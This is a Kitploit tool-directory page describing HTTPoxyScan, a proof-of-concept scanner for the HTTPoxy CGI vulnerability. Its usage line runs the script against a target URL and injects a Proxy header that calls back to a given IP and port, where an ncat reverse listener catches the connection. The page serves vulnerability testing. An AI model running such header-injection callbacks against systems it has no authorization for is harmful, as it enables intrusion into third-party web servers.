Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
HTTPoxyScan — HTTPoxy Exploit Scanner by 1N3 @CrowdShield | Kitploit
Tools/GitHubGitHub/1n3/httpoxyscan
Vulnerability ScannersExploitationWeb Application ExploitationWeb Security
GitHub1n3/httpoxyscan

HTTPoxyScan

HTTPoxy Exploit Scanner by 1N3 @CrowdShield

View Repository
104429 years agoReviewed by Kitploit

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

HTTPoxy Exploit Scanner

by 1N3 @CrowdShield (https://crowdshield.com) Last Updated: 20160720

ABOUT:

PoC/Exploit scanner to scan common CGI files on a target URL for the HTTPoxy vulnerability. Httpoxy is a set of vulnerabilities that affect application code running in CGI, or CGI-like environments. For more details, go to https://httpoxy.org.

REQUIREMENTS:

Requires ncat to establish reverse session

USAGE:

root@kitploit:~
./httpoxyscan.py https://target.com cgi_list.txt 10.1.2.243 3000

This will scan https://target.com with a list of common CGI files while injecting a Proxy header back to a given IP:PORT. A reverse listener will catch the incoming connection to confirm the remote site is vulnerable.

DISCLAIMER:

I take no responsibility for wrong doing or misuse of this exploit.

Download Tool